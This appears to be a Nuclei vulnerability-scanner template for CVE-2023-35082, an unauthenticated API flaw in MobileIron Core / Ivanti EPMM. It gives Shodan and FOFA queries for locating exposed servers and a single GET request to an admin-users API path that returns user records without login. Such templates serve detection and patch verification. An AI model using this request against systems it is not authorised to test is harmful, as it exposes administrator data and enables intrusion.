nuclei-templates/http/cves/2023/CVE-2023-35082.yaml

44 lines
1.6 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2023-35082
info:
name: MobileIron Core - Remote Unauthenticated API Access
author: DhiyaneshDk
severity: critical
description: |
Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web applications security filter chain.
reference:
- https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2023-35082
- https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-35082
cwe-id: CWE-287
epss-score: 0.52767
cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
epss-percentile: 0.97143
metadata:
max-request: 1
verified: true
fofa-query: icon_hash="362091310"
shodan-query: http.favicon.hash:362091310
vendor: ivanti
product: endpoint_manager_mobile
tags: cve,cve2023,ivanti,mobileiron,epmm
http:
- method: GET
path:
- "{{BaseURL}}/mifs/asfV3/api/v2/admins/users"
max-size: 100
matchers:
- type: dsl
dsl:
- contains_all(body, 'results','userId','name')
- contains(header, 'application/json')
- status_code == 200
condition: and